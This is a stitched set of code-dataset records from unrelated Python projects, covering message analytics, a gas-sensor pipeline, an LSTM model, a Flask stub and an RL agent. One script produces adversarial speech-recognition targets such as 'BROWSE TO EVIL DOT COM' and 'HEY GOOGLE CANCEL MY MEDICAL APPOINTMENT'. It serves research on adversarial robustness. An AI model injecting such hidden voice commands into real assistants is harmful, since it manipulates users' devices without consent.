calc_median_response_time_per_group(messages_time_diff,['client_id','user_id']).reset_index()\n\n# ***** functions dealing with scheduling ************\n\ndef calc_median_schedule_time_per_group(messages):\n # some times can be negative, will use the absolute value for now\n tdiff = np.abs(messages['send_at'].apply(lambda x: x.round('s')) - messages['created_at'].apply(lambda x: x.round('s')))\n return [np.median(tdiff), np.amax(tdiff)]\n\ndef calc_median_schedule_time(messages):\n median_schedule_time = messages.groupby(['client_id','user_id']).apply(calc_median_schedule_time_per_group)\n return (pd.DataFrame(median_schedule_time.values.tolist(),\n columns=['median_schedule_time','max_schedule_time'],index=median_schedule_time.index))\n\n# ***** functions dealing with finding report/court dates from text messages ************\n\ndef estimate_report_dates(messages,col_names):\n \"\"\" Estimates dates from text messages and provide an estimate for the next report dates. \"\"\"\n messages_send_dates = messages[col_names].copy()\n messages_send_dates['dates_ext'] = messages_send_dates.apply(find_dates_in_row,axis=1)['body']\n messages_send_dates['dates_est'] = messages_send_dates.apply(compare_dates_in_row,axis=1)['dates_ext']\n \n return messages_send_dates\n\ndef calc_median_report_time_diff_per_group(messages_send_dates):\n \"\"\" Calculates the median time difference between\n message send time and estimated report or court dates. \"\"\"\n \n # reset index to apply operation within group\n messages_send_dates.reset_index(drop=True,inplace=True)\n \n # loop over all estimated dates\n tdiff = []\n for i in range(len(messages_send_dates)):\n if messages_send_dates.loc[i,'dates_est']:\n for date_est in messages_send_dates.loc[i,'dates_est']:\n tdiff.append(date_est - messages_send_dates.loc[i,'send_at'])\n \n return [np.median(tdiff),len(tdiff)] if tdiff else [pd.NaT,0]\n\ndef calc_median_report_time_diff(messages):\n \"\"\" Calculates the median report time and number of possible report times per relationship. \"\"\"\n col_select = ['client_id','user_id','send_at','body']\n messages_send_dates = estimate_report_dates(messages,col_select)\n median_report_time = messages_send_dates.groupby(['client_id','user_id']).apply(calc_median_report_time_diff_per_group)\n return pd.DataFrame(median_report_time.values.tolist(),columns=['median_report_time','n_report_time'],index=median_report_time.index)\n\n# ***** functions dealing with topic classification in messages ************\n\ndef build_messages_vectorizer():\n \"\"\" Compile term frequency vectorizer \"\"\"\n tf_vectorizer = CountVectorizer(max_df=0.95, min_df=2, max_features=n_features,\n stop_words='english',\n token_pattern=r'[a-zA-Z\\-][a-zA-Z\\-]{2,}')\n return tf_vectorizer\n\ndef find_msg_topic(prob):\n \"\"\" Categorize messages into topic with the maximum probability.\n Assign 0 for uniform probabilities. \"\"\"\n if (prob == prob.max()).all():\n return [0,np.median(prob)]\n else:\n return [prob.argmax()+1,prob.max()] # add 1 to the topics to distinguish from 'unclassified' or uniform probability\n\ndef find_msg_topic_in_row(row,tf_in_vect,tf_out_vect,lda_in_model,lda_out_model):\n \"\"\" Models and vectorizer must be passed in. \"\"\"\n \n # select trained model depending on it sent or received\n if row['inbound']:\n model = lda_in_model\n tf_vectorizer = tf_in_vect\n else:\n model = lda_out_model\n tf_vectorizer = tf_out_vect\n \n if row.isnull()['body']:\n max_id, max_val = (0,0)\n else:\n max_id, max_val = find_msg_topic(model.transform(tf_vectorizer.transform([row['body']]))[0])\n return pd.Series({'topic_max':max_id,'topic_maxval':max_val})\n\ndef load_topic_model_components(messages):\n \"\"\" Loads topic model components into workspace. Must feed in the entire messages table. \"\"\"\n # loads text vectorizer\n tf_outbound_vectorizer = build_messages_vectorizer()\n tf_inbound_vectorizer = build_messages_vectorizer()\n \n messages_outbound = messages.query('inbound == False')\n messages_inbound = messages.query('inbound == True')\n \n data_samples_outbound = messages_outbound[messages_outbound['body'].notnull()]['body'].values\n data_samples_inbound = messages_inbound[messages_inbound['body'].notnull()]['body'].values\n \n # fit vectorizer to corresponding data\n tf_outbound = tf_outbound_vectorizer.fit_transform(data_samples_outbound)\n tf_inbound = tf_inbound_vectorizer.fit_transform(data_samples_inbound)\n \n # loads models\n lda_outbound_model = pickle.load(open(fname_outbound_topic_model, 'rb'))\n lda_inbound_model = pickle.load(open(fname_inbound_topic_model, 'rb'))\n \n \n return [lda_outbound_model, lda_inbound_model,\n tf_outbound_vectorizer, tf_inbound_vectorizer,\n tf_outbound, tf_inbound]\n\ndef print_top_words(model, feature_names, n_top_words):\n for topic_idx, topic in enumerate(model.components_):\n message = \"Topic #%d: \" % topic_idx\n message += \" \".join([feature_names[i]\n for i in topic.argsort()[:-n_top_words - 1:-1]])\n print(message)\n print()\n\ndef show_top_words(model,label='',show_result=False):\n \"\"\" Topic ordering is model dependent, which in turn is data dependent. \"\"\"\n for topic_idx, topic in enumerate(model.components_):\n # arsort() sorts by increasing probabilities\n top_words_idx = topic.argsort()[:-n_top_words - 1:-1]\n top_words = [tf_feature_names[i] for i in top_words_idx.tolist()]\n top_words_freq = np.sort(topic)[:-n_top_words - 1:-1]\n \n # plot results\n plt.figure(figsize=(10,6))\n sns.barplot(y=top_words,x=top_words_freq)\n #plt.xticks(rotation=60)\n plt.ylabel('Word')\n plt.xlabel('Topic '+label+' '+str(topic_idx+1)+'\\nWord frequency')\n fout = 'topic_'+label+'_'+str(topic_idx+1)+'.png'\n plt.savefig(fout,dpi=200)\n if show_result: plt.show()\n plt.close()\n \ndef map_messages_topics(messages,tf_in_vect,tf_out_vect,lda_in_model,lda_out_model):\n \"\"\" Determines the topic from each messages.\n Classify sent and received messages according to respective models. \"\"\"\n \n messages_topics = (messages[['body','inbound']]\n .apply(lambda row: find_msg_topic_in_row(row,tf_in_vect,tf_out_vect,lda_in_model,lda_out_model),axis=1))\n \n return messages.merge(messages_topics,left_index=True,right_index=True)\n\n\ndef show_messages_sequence(messages_uc,user_id,client_id,show_result=False):\n \"\"\" Show message sequence for a relationship. \"\"\"\n \n # select only a relationship\n messages_uc = messages_uc.query('client_id == @client_id and user_id == @user_id').sort_values('send_at').reset_index(drop=True)\n \n # separate into sent and received\n messages_inbound = messages_uc.query('inbound == True')\n messages_outbound = messages_uc.query('inbound == False')\n \n # plot commands\n plt.figure(figsize=(10,6))\n # +0.01 in the size label is to plot NaN messages\n if 'topic_max' in messages_uc.columns:\n plt.scatter(messages_outbound['send_at'].values,\n messages_outbound['topic_max'].values,\n s=(messages_outbound['topic_maxval']+0.01)*200,c='red',label='sent',alpha=0.4)#,c=messages_sample['inbound'].values)\n plt.scatter(messages_inbound['send_at'].values,\n messages_inbound['topic_max'].values,\n s=(messages_inbound['topic_maxval']+0.01)*200,c='blue',label='received',alpha=0.4)\n plt.plot(messages_uc['send_at'].values,messages_uc['topic_max'].values,\n marker='',linestyle='-',color='black',alpha=0.4)\n \n if 'dates_est' in messages_uc.columns:\n for elem in messages_uc['dates_est']:\n for xc in elem:\n plt.axvline(x=xc,color='green',alpha=0.4) # plot vertical lines for estimated court dates\n plt.xlabel('Date')\n plt.ylabel('Topic')\n plt.legend()\n plt.xlim([messages_uc['send_at'].min()-pd.Timedelta(days=2), messages_uc['send_at'].max()+pd.Timedelta(days=2)])\n plt.title('user: ' + str(user_id) + ' client: ' + str(client_id))\n plt.savefig('messages_topics_u'+str(user_id)+'_c'+str(client_id)+'.png',dpi=200)\n if show_result: plt.show()\n plt.close()\n\ndef map_messages_topics_list(messages,uc_list,estimate_date=False):\n \"\"\" Maps messages topics for a list of user and client.\n Outputs corresponding messages and plot. \"\"\"\n \n # loads topic model\n [lda_outbound_model, lda_inbound_model,\n tf_outbound_vectorizer, tf_inbound_vectorizer,\n tf_outbound, tf_inbound] = load_topic_model_components(messages)\n \n for client_id, user_id in uc_list:\n messages_sample = messages.query('client_id == @client_id and user_id == @user_id').sort_values('send_at').reset_index(drop=True)\n messages_sample = map_messages_topics(messages_sample,\n tf_inbound_vectorizer,tf_outbound_vectorizer,\n lda_inbound_model,lda_outbound_model)\n messages_sample[['inbound','send_at','body','topic_max','topic_maxval']].to_csv('messages_u'+str(user_id)+'_c'+str(client_id)+'.csv',index=False)\n \n # add annotations for estimated report/court dates\n if estimate_date:\n messages_sample = estimate_report_dates(messages_sample,messages_sample.columns)\n \n show_messages_sequence(messages_sample,user_id,client_id,show_result=False)\n\n\ndef count_topics_excluding_per_group(messages_topics,exclude_list=[]):\n \"\"\" Counts number of topics that are not in the exclude_list. \"\"\"\n return len(set(exclude_from_list(messages_topics['topic_max'],exclude_list)))\n\ndef calc_mode_topic_per_group(messages_topics):\n \"\"\" Calculates the most frequent topic. Also, takes into account the probability. \"\"\"\n if messages_topics.isnull()['topic_max'].any():\n return np.nan\n \n mode_val = messages_topics['topic_max'].mode().values\n \n if len(mode_val) == 1:\n return mode_val[0]\n elif len(mode_val) > 1:\n mode_val_mask = messages_topics['topic_max'].isin(mode_val)\n mode_val_loc = messages_topics[mode_val_mask]['topic_maxval'].idxmax()\n mode_val = messages_topics.loc[mode_val_loc,'topic_max']\n elif len(mode_val) == 0:\n mode_val = np.nan\n\n return mode_val\n\ndef calc_median_topics(messages,outbound_exclude_list=[],inbound_exclude_list=[]):\n \"\"\" Calculates the median topic values per conversation.\n Returns inbound/outbound median topics, number of topics, and number of topics excluding specified topics. \"\"\"\n [lda_outbound_model, lda_inbound_model,\n tf_outbound_vectorizer, tf_inbound_vectorizer,\n tf_outbound, tf_inbound] = load_topic_model_components(messages)\n messages = map_messages_topics(messages,\n tf_inbound_vectorizer,tf_outbound_vectorizer,\n lda_inbound_model,lda_outbound_model)\n \n return pd.concat(join='outer',axis=1)\n\n outbound_topics_median = messages.query('inbound == False').groupby(['client_id','user_id'])['topic_max'].agg(['median','nunique'])\n outbound_topics_median.columns = ['outbound_median_topic','outbound_ntopics']\n outbound_ntopics_exclude = pd.DataFrame(messages.query('inbound == False').groupby(['client_id','user_id'])\n .apply(lambda x: count_topics_excluding_per_group(x,outbound_exclude_list)),\n columns=['outbound_ntopics_exclude'])\n inbound_topics_median = messages.query('inbound == True').groupby(['client_id','user_id'])['topic_max'].agg(['median','nunique'])\n inbound_topics_median.columns = ['inbound_median_topic','inbound_ntopics']\n inbound_ntopics_exclude = pd.DataFrame(messages.query('inbound == True').groupby(['client_id','user_id'])\n .apply(lambda x: count_topics_excluding_per_group(x,inbound_exclude_list)),\n columns=['inbound_ntopics_exclude'])\n return pd.concat([outbound_topics_median,outbound_ntopics_exclude,\n inbound_topics_median,inbound_ntopics_exclude], join='outer',axis=1)\n\ndef calc_mode_topics(messages):\n \"\"\" Calculates the mode topice values per conversation. \"\"\"\n [lda_outbound_model, lda_inbound_model,\n tf_outbound_vectorizer, tf_inbound_vectorizer,\n tf_outbound, tf_inbound] = load_topic_model_components(messages)\n messages = map_messages_topics(messages,\n tf_inbound_vectorizer,tf_outbound_vectorizer,\n lda_inbound_model,lda_outbound_model)\n \n outbound_topics_mode = pd.DataFrame(messages.query('inbound == False').groupby(['client_id','user_id'])\n .apply(calc_mode_topic_per_group), columns=['outbound_mode_topic'])\n outbound_ntopics = messages.query('inbound == False').groupby(['client_id','user_id'])['topic_max'].agg(['nunique'])\n outbound_ntopics.columns = ['outbound_ntopics']\n inbound_topics_mode = pd.DataFrame(messages.query('inbound == True').groupby(['client_id','user_id'])\n .apply(calc_mode_topic_per_group), columns=['inbound_mode_topic'])\n inbound_ntopics = messages.query('inbound == True').groupby(['client_id','user_id'])['topic_max'].agg(['nunique'])\n inbound_ntopics.columns = ['inbound_ntopics']\n\n return pd.concat([outbound_topics_mode,outbound_ntopics,inbound_topics_mode,inbound_ntopics],join='outer',axis=1)\n\n# ***** functions for supervision failure classification ************\n\ndef downsample_majority_class_to_sf(df):\n \"\"\" Due to the imbalance data set. Downsample the majority class into two categories.\n Two categories: supervision_failure == [True,False] \"\"\"\n \n # Separate majority and minority classes\n df_majority = df.query('supervision_failure == False')\n df_minority = df.query('supervision_failure == True')\n \n # Downsample majority class\n df_majority_downsampled = resample(df_majority, \n replace=False, # sample without replacement\n n_samples=len(df_minority)) # to match minority class\n #random_state=123) # reproducible results\n \n # Combine minority class with downsampled majority class\n return pd.concat([df_majority_downsampled, df_minority])\n\ndef print_feature_importance(tree_model,features):\n \"\"\" Prints out the predictive features. \"\"\"\n # http://scikit-learn.org/stable/auto_examples/ensemble/plot_forest_importances.html\n importances = tree_model.feature_importances_\n std = np.std([tree.feature_importances_ for tree in tree_model.estimators_], axis=0)\n indices = np.argsort(importances)[::-1]\n\n # Print the feature ranking\n print(\"Feature ranking:\")\n\n for f in range(len(features)):\n print(\"{:d}. feature {:d}: {} ({:f} +/- {:f})\"\n .format(f + 1, indices[f], \n features[indices[f]], importances[indices[f]], std[indices[f]]))\n\ndef scan_prob_each_feature(model,X,h,features,fidx,show_result=False,save_result=False):\n \"\"\" Calculates the probabilities by changing each feature value for all observations.\n Requires externally defined step sizes.\n Plots the ['mean','1st percentile','5th percentile','10th percentile','25th percentile','median'] \"\"\"\n \n Xmax = np.amax(X,axis=0)\n Xmin = np.amin(X,axis=0)\n\n X_copy = np.copy(X)\n\n print('Processing: ', features[fidx])\n \n xf = np.arange(Xmin[fidx],Xmax[fidx],h[fidx]) # range of feature values\n yf = np.zeros((len(xf),6))\n yf_arr = np.zeros((X.shape[0],len(xf)))\n \n # loop over each feature value\n for i in range(len(xf)):\n X_copy[:,fidx] = xf[i] # assign that feature value for all observations for that feature\n yprobi = model.predict_proba(X_copy)[:,0] # calculate probabilities\n yf[i,:] = [np.mean(yprobi),np.percentile(yprobi,1),np.percentile(yprobi,5),np.percentile(yprobi,10),np.percentile(yprobi,25),np.median(yprobi)]\n yf_arr[:,i] = yprobi\n \n # plot result\n if save_result | show_result:\n plt.figure(figsize=(16,10))\n plt.plot(xf,yf)\n for i in range(len(xf)):\n plt.scatter(xf[i]*np.ones(X.shape[0]),yf_arr[:,i],c='gray',alpha=0.2) # need to change to swarm plot for better visualization!\n plt.xlabel(features[fidx])\n plt.ylabel('Probabilities')\n plt.legend(['mean','1st percentile','5th percentile','10th percentile','25th percentile','median'])\n if save_result: plt.savefig('model_prob_'+features[fidx]+'.png',dpi=200)\n if show_result: plt.show()\n plt.close()\n \n return xf, yf, yf_arr\n\n# ***** functions for word count ************\n\ndef find_wordcount_in_string(string):\n \"\"\" Calculates word counts in a string. \"\"\"\n if isinstance(string,str):\n return len(string.split())\n else:\n return 0\n\ndef find_wordcount_per_group(messages):\n \"\"\" Calculates word counts in a group.\n Returns the median and maximum values. \"\"\"\n messages = messages.sort_values('send_at',ascending=True).reset_index(drop=True)\n \n wcount = []\n for i in range(len(messages)):\n wcount.append(find_wordcount_in_string(messages.loc[i,'body']))\n \n return [np.median(wcount), np.amax(wcount)] if wcount else [0,0]\n\ndef find_wordcount(messages):\n \"\"\" Counts words in text messages. \"\"\"\n outbound_median_wordcount = messages.query('inbound == False').groupby(['client_id','user_id']).apply(find_wordcount_per_group)\n inbound_median_wordcount = messages.query('inbound == True').groupby(['client_id','user_id']).apply(find_wordcount_per_group)\n \n outbound_counts = pd.DataFrame(outbound_median_wordcount.values.tolist(),\n columns=['outbound_median_wordcount','outbound_max_wordcount'],\n index=outbound_median_wordcount.index)\n inbound_counts = pd.DataFrame(inbound_median_wordcount.values.tolist(),\n columns=['inbound_median_wordcount','inbound_max_wordcount'],\n index=inbound_median_wordcount.index)\n \n return pd.concat([outbound_counts,inbound_counts],axis=1).fillna(0)\n\n# ***** functions for significance testing ************\n\ndef permutation_test_diff_means(x,y,nperm=10000):\n \"\"\" Calculates the p-value for the difference in means. \"\"\"\n # Compute difference of means\n empirical_diff_means = diff_of_means(x, y)\n\n # Draw permutation replicates\n perm_replicates = draw_perm_reps(x, y,\n diff_of_means, size=nperm)\n\n # Compute p-value\n p = np.sum(perm_replicates >= empirical_diff_means) / len(perm_replicates)\n \n return p\n\ndef distribution_test_diff_means(x,y,nperm=10000):\n \"\"\" Use the difference of means to test if data comes from same distribution. \"\"\"\n # Compute difference of means\n empirical_diff_means = diff_of_means(x, y)\n\n xy_concat = np.concatenate((x, y))\n\n # Initialize bootstrap replicates\n bs_replicates = np.empty(nperm)\n\n for i in range(nperm):\n # Generate bootstrap sample\n bs_sample = np.random.choice(xy_concat, size=len(xy_concat))\n \n # Compute replicate\n bs_replicates[i] = diff_of_means(bs_sample[:len(x)],\n bs_sample[len(x):])\n\n # Compute and print p-value: p\n p = np.sum(bs_replicates >= empirical_diff_means) / len(bs_replicates)\n \n return p\n\n \n # ***** functions for sentiment extraction ************\n\ndef find_sentiment_in_string(string):\n if isinstance(string,str):\n return list(TextBlob(string).sentiment[:])\n else:\n return [np.nan,np.nan]\n\ndef find_sentiment_in_group(messages):\n \"\"\" Find median, minimum, and maximum sentiments per relationship. \"\"\"\n pol = []\n sub = []\n for message in messages['body']:\n polt,subt = find_sentiment_in_string(message)\n pol.append(polt)\n sub.append(subt)\n \n if np.isnan(polt).all():\n return [np.nan, np.nan, np.nan, np.nan, np.nan]\n else:\n return [np.nanmedian(pol),np.nanmedian(sub),np.nanmin(pol),np.nanmax(pol),np.nanmax(sub)]\n\ndef find_sentiment(messages):\n median_sentiments = messages.groupby(['client_id','user_id']).apply(find_sentiment_in_group)\n return pd.DataFrame(median_sentiments.values.tolist(),\n columns=['median_polarity','median_subjectivity','min_polarity','max_polarity','max_subjectivity'],\n index=median_sentiments.index)\n","sub_path":"Baltimore.revisited/data/cfatools.py","file_name":"cfatools.py","file_ext":"py","file_size_in_byte":35954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"383539118","text":"from os import listdir\nfrom os.path import isfile, join\nimport sys\nimport argparse\nimport random\n\ndef _get_file_names(audio_dir):\n file_names = []\n for f in listdir(audio_dir):\n if f.endswith(\".wav\"):\n file_names.append(f)\n \n return file_names\n\ndef main():\n parser = argparse.ArgumentParser(description=None)\n parser.add_argument('--input_dir', type=str, required=True,\n help='Input Dir')\n parser.add_argument('--output_file', type=str, required=False,\n default=\"defense_data.txt\",\n help='Output File')\n \n args = parser.parse_args()\n while len(sys.argv) > 1:\n sys.argv.pop() \n\n target_transcriptions = [\n \"BROWSE TO EVIL DOT COM\",\n \"HEY GOOGLE CANCEL MY MEDICAL APPOINTMENT\",\n \"THIS IS AN ADVERSARIAL EXAMPLE\",\n \"HEY GOOGLE\"\n ]\n file_names = _get_file_names(args.input_dir)\n\n transcription_list = []\n for idx in range(len(file_names)):\n transcription_list.append(random.choice(target_transcriptions)) \n\n # transcription_list = [args.target_transcription] * len(file_names)\n \n line1 = \",\".join(file_names)\n line2 = \",\".join(transcription_list)\n line3 = \",\".join(transcription_list)\n\n file_str = \"\\n\".join([line1, line2, line3]) + \"\\n\"\n\n with open(args.output_file, 'w') as f:\n f.write(file_str)\n\n\nif __name__ == '__main__':\n main()","sub_path":"examples/adversarial_asr/create_defense_data.py","file_name":"create_defense_data.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"186749979","text":"from models.rnn import Rnn\n\nfrom tensorflow.keras.layers import Dense, Dropout, LSTM, Embedding\n\nclass Lstm(Rnn):\n\n def __init__(self):\n super().__init__()\n\n def build_model(self, input_length):\n # input_length = X.shape[1]\n self.model.add(Embedding(5000, 256, input_length=input_length))\n self.model.add(Dropout(0.3))\n self.model.add(LSTM(256, return_sequences=True, dropout=0.3, recurrent_dropout=0.2))\n self.model.add(LSTM(256, dropout=0.3, recurrent_dropout=0.2))\n self.model.add(Dense(2, activation='softmax'))\n self.model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n self.model.summary()\n","sub_path":"models/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"411690589","text":"\nfrom flask import Flask\nfrom route.aaa import main as aaa_routes\n\n\napp = Flask(__name__)\n\napp.register_blueprint(aaa_routes, url_prefix='/aaa')\n\nif __name__ == '__main__':\n config = dict(\n host='0.0.0.0',\n port=80,\n )\n app.run(**config)\n","sub_path":"sdwan/apiary_active_entrance(Active Entrance)/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"346603109","text":"\"\"\"\nA module consisting of pipeline steps that processed events will pass through.\n\"\"\"\n\nfrom abc import ABC, abstractmethod\nfrom collections import deque, namedtuple\nimport logging\nfrom time import time\nfrom gasmon.locations import Location\nfrom gasmon.plot import *\n\nclass AveragedEvent():\n def __init__(self, average_event):\n self.location_id = average_event[0]\n self.x = average_event[1]\n self.y = average_event[2]\n self.value = average_event[3]\n self.timestamp = average_event[4]\n\n def __str__(self):\n return f\"{self.location_id},{self.x}, {self.y}, {self.value},{self.timestamp},\"\n\nclass SensorsAverage():\n def __init__(self, sensors_average):\n self.value = sensors_average[0]\n self.timestamp = sensors_average[1]\n def __str__(self):\n return f\"{self.value},{self.timestamp},\"\n\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nclass Pipeline(ABC):\n \"\"\"\n An abstract base class for pipeline steps.\n \"\"\"\n\n @abstractmethod\n def handle(self, events):\n \"\"\"\n Transform the given stream of events into a processed stream of events.\n \"\"\"\n pass\n\n def sink(self, sink):\n \"\"\"\n Funnel events from this Pipeline into the given sink.\n \"\"\"\n return PipelineWithSink(self, sink)\n\n\nclass PipelineWithSink(Pipeline):\n \"\"\"\n A Pipeline with a final processing step (a Sink).\n \"\"\"\n\n def __init__(self, pipeline, sink):\n \"\"\"\n Create a Pipeline with a Sink.\n \"\"\"\n self.pipeline = pipeline\n self.sink = sink\n\n def handle(self, events):\n \"\"\"\n Handle events by first letting the pipeline process them, then \n passing the result to the sink\n \"\"\"\n self.sink.handle(self.pipeline.handle(events))\n\n\nclass FixedDurationSource(Pipeline):\n \"\"\"\n A Pipeline step that processes events for a fixed duration.\n \"\"\"\n\n def __init__(self, run_time_seconds, locations):\n \"\"\"\n Create a FixedDurationSource which will run for the given duration.\n \"\"\"\n self.run_time_seconds = run_time_seconds\n self.events_processed = 0\n self.locations = locations\n\n def handle(self, events):\n \"\"\"\n Pass on all events from the source, but cut it off when the time limit is reached.\n \"\"\"\n\n # Calculate the time at which we should stop processing\n end_time = time() + self.run_time_seconds\n logger.info(f'Processing events for {self.run_time_seconds} seconds')\n start_time = time()\n duration = end_time - start_time\n block_time = 20\n\n ids_set = set()\n loc_set = set()\n\n # Process events for as long as we still have time remaining\n i = 0\n j = 1\n k = 1\n recent_events = []\n with open(\"averaged_readings.csv\",'w') as out:\n out.write(\"Location ID, x, y, Value, Timestamp, Block, Total runtime = \"+str(duration)+\", Block time = \"\\\n +str(block_time)+\" \\n\")\n out.close()\n\n with open(\"averaged_sensors.csv\",'w') as out:\n out.write(\"Timestamp, Value, Block, Total runtime = \"+str(duration)+\", Block time = \"+str(block_time)+\" \\n\")\n out.close()\n\n for event in events:\n if time() < end_time:\n if event.event_id in ids_set:\n i = i + 1\n continue\n else:\n recent_events.append(event)\n ids_set.add(event.event_id)\n loc_set.add(event.location_id)\n i=i+1\n if (time() - start_time) > block_time:\n plot_data = []\n av_sensor_values = []\n av_sensor_times = []\n for id in loc_set:\n values = []\n times = []\n for recent_event in recent_events:\n if id in recent_event:\n values.append(float(recent_event.value))\n times.append(int(recent_event.timestamp))\n values_average = float(sum(values)) / float(len(values))\n times_average = float(sum(times)) / float(len(times))\n times_average = int(round(times_average))\n av_sensor_values.append(values_average)\n av_sensor_times.append(float(times_average))\n for Location in self.locations:\n if id == Location.id:\n x = Location.x\n y = Location.y\n loc_average_event = AveragedEvent(average_event=[id, x, y, values_average, times_average])\n print(\"Averaged location event is\")\n logger.debug(f'Processing average event: {loc_average_event}')\n with open(\"averaged_readings.csv\",'a') as out:\n out.write(f'{loc_average_event}'+str(k)+\"\\n\")\n out.close()\n xyz = [x, y, values_average]\n plot_data.append(xyz)\n j=j+1\n yield loc_average_event\n\n av_sensor_val = sum(av_sensor_values) / float(len(av_sensor_values))\n av_sensor_time = sum(av_sensor_times) / float(len(av_sensor_times))\n av_sensor_time = int(av_sensor_time)\n all_sensors_average = SensorsAverage(sensors_average=[av_sensor_val,av_sensor_time])\n with open(\"averaged_sensors.csv\", 'a') as out:\n out.write(f'{all_sensors_average}' + str(k) + \"\\n\")\n out.close()\n estimates = self.GaussEstimates(plot_data)\n fit = Gaussian3D(10.0, 1000.0, 500.0, 1000.0, 1000.0)\n plot(plot_data, fit)\n\n k=k+1\n start_time = time()\n self.events_processed += 1\n\n\n else:\n logger.debug(f'Procesing event: {event}')\n self.events_processed += 1\n else:\n logger.info('Finished processing events')\n print(\"Number of unique events processed\")\n print(len(ids_set))\n print(\"All events including duplicates\")\n print(i)\n print(\"Total number of averaged events\")\n print(j)\n return\n\n def GaussEstimates(self, plot_data):\n print(\"AVERAGED LOCATION VALUES USED TO OBTAIN INITIAL ESTIMATES\")\n print(plot_data)\n i=0\n z_values = [location[2] for location in plot_data]\n index = z_values.index(max(z_values))\n","sub_path":"gasmon/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":7094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231329224","text":"from PIL import Image \nimport numpy as np \nimport urllib.request\nimport h5py\nimport requests\nfrom io import BytesIO\nimport matplotlib.pyplot as plt\n\nname =\"fm_-14165_18122\" #the amazon code of the movie\ninfo = [(50, 150), (0, 100)]\nx0 = info[1][0]\nx1 = info[1][1]\ny0 = info[0][0]\ny1 = info[0][1]\n\nDir = \"/Users/loganjaeger/Desktop/aerogel/track ims/\"\n\ndef load_in_ims(code, save_dir):\n\tframe = 1\n\twhile True:\n\t\tpath = Dir + code + \"/\" + str(frame) + \".png\"\n\t\ttry:\n\t\t\timg = plt.imread(path)\n\t\t\t#print(img.shape)\n\t\texcept FileNotFoundError:\n\t\t\tbreak\n\t\timg = img[y0:y1, x0:x1, :] #slicing movie so that we only get the part with the track\n\t\tplt.imsave(save_dir + \"/\" + str(frame) + \".png\", img)\n\t\tframe += 1\n\nsave_dir = Dir + \"TRACK-\" + name\n\nload_in_ims(name, save_dir)","sub_path":"CraterFromMovie.py","file_name":"CraterFromMovie.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"462700463","text":"import gym\nimport torch\nimport numpy as np\nimport random\n\nfrom torch.distributions import Categorical\nfrom torch.nn.utils import clip_grad_norm_\nfrom gym.utils import seeding\n\nfrom nets import Memory, v_net, q_net, dueling_q_net, skill_net, classifier_net, RND_module, discrete_AC_mixed, discrete_AC\n\nimport os\nimport time\nimport pickle\nfrom sys import stdout\nimport itertools\nimport curses\n\nimport cv2\nfrom cv2 import VideoWriter, VideoWriter_fourcc\nfrom PIL import Image\n\nwidth = 1024\nheight = 768\nFPS = 60\n\nfourcc = VideoWriter_fourcc(*'MP42')\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n# Functions\n#############\ndef updateNet(target, source, tau): \n for target_param, source_param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(target_param.data * (1.0 - tau) + source_param.data * tau)\n\ndef scale_action(a, min, max):\n return (0.5*(a+1.0)*(max-min) + min)\n\ndef set_seed(n_seed):\n random.seed(n_seed)\n np.random.seed(n_seed)\n torch.manual_seed(n_seed)\n if device == \"cuda\": torch.cuda.manual_seed(n_seed)\n\ndef is_float(x):\n return isinstance(x, float)\n\ndef is_int(x):\n return isinstance(x, int)\n\ndef is_tensor(x):\n return isinstance(x, torch.FloatTensor) or isinstance(x, torch.Tensor)\n\n# Classes\n##############\nclass Agent:\n def __init__(self, s_dim, a_dim, n_tasks, params, seed=0):\n\n self.params = params.copy()\n default_params = {\n 'n_concepts': 10,\n 'n_skills': 8,\n 'decision_type': 'eps', \n 'alpha': {\n 'sl': 0.1,\n 'ql': 0.1,\n 'cl': 1e-6, \n },\n 'init_epsilon': 1.0,\n 'min_epsilon': 0.4, \n 'delta_epsilon': 2.5e-7, \n 'init_threshold_entropy_alpha': 0.0,\n 'delta_threshold_entropy_alpha': 8e-6,\n 'stoA_learning_type': 'SAC',\n 'DQL_epsds_target_update': 6000, \n 'joint_sq_learning': False, # TODO: add during agent call\n 'target_update_rate': 5e-3, \n 'lr': 3e-4,\n 'dims': {\n 'init_prop': 2,\n 'last_prop': s_dim,\n 'init_ext': 3,\n 'last_ext': s_dim-60,\n }, \n 'batch_size': {\n 'sl': 256,\n 'ql': 256,\n 'tl': 256\n }, \n 'memory_capacity': 1200000,\n 'GAE_lambda': 0.95,\n 'gamma_E': 0.99,\n 'gamma_I': 0.975, \n 'clip_value': 0.5,\n 'factor_I': 1.0,\n 'entropy_annealing': False,\n 'RND_update_proportion': 0.25,\n 'intrinsic_learning': True \n }\n \n for key, value in default_params.items():\n if key not in self.params.keys():\n self.params[key] = value\n \n self.s_dim = s_dim\n self.a_dim = a_dim\n self.sa_dim = self.s_dim + self.a_dim\n self.sars_dim = 2*self.s_dim + self.a_dim + 1\n self.sarsd_dim = self.sars_dim + 1\n self.t_dim = self.sarsd_dim + 3\n\n self.joint = self.params['joint_learning']\n self.n_tasks = n_tasks\n self.seed = seed\n self.n_skills = n_tasks['sl'] if not self.joint else self.params['n_skills']\n self.counter = 0\n self.counter_cl = 0\n v_dim = self.n_skills if not self.joint else n_tasks['ql'] \n\n self.n_concepts = self.params['n_concepts']\n self.dims = self.params['dims']\n self.batch_size = self.params['batch_size']\n self.lr = self.params['lr']\n self.GAE_lambda = self.params['GAE_lambda']\n self.gamma_E = self.params['gamma_E']\n self.gamma_I = self.params['gamma_I'] \n self.clip_value = self.params['clip_value']\n self.decision_type = self.params['decision_type']\n self.stoA_learning_type = self.params['stoA_learning_type']\n self.DQL_epsds_target_update = 